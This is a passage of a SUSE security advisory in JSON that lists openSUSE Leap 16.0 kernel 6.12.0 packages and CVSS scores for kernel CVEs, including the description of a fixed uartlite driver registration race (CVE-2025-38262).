"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-38243"
},
{
"cve": "CVE-2025-38262",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38262"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntty: serial: uartlite: register uart driver in init\n\nWhen two instances of uart devices are probing, a concurrency race can\noccur. If one thread calls uart_register_driver function, which first\nallocates and assigns memory to \u0027uart_state\u0027 member of uart_driver\nstructure, the other instance can bypass uart driver registration and\ncall ulite_assign. This calls uart_add_one_port, which expects the uart\ndriver to be fully initialized. This leads to a kernel panic due to a\nnull pointer dereference:\n\n[ 8.143581] BUG: kernel NULL pointer dereference, address: 00000000000002b8\n[ 8.156982] #PF: supervisor write access in kernel mode\n[ 8.156984] #PF: error_code(0x0002) - not-present page\n[ 8.156986] PGD 0 P4D 0\n...\n[ 8.180668] RIP: 0010:mutex_lock+0x19/0x30\n[ 8.188624] Call Trace:\n[ 8.188629] ? __die_body.cold+0x1a/0x1f\n[ 8.195260] ? page_fault_oops+0x15c/0x290\n[ 8.209183] ? __irq_resolve_mapping+0x47/0x80\n[ 8.209187] ? exc_page_fault+0x64/0x140\n[ 8.209190] ? asm_exc_page_fault+0x22/0x30\n[ 8.209196] ? mutex_lock+0x19/0x30\n[ 8.223116] uart_add_one_port+0x60/0x440\n[ 8.223122] ? proc_tty_register_driver+0x43/0x50\n[ 8.223126] ? tty_register_driver+0x1ca/0x1e0\n[ 8.246250] ulite_probe+0x357/0x4b0 [uartlite]\n\nTo prevent it, move uart driver registration in to init function. This\nwill ensure that uart_driver is always registered when probe function\nis called.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
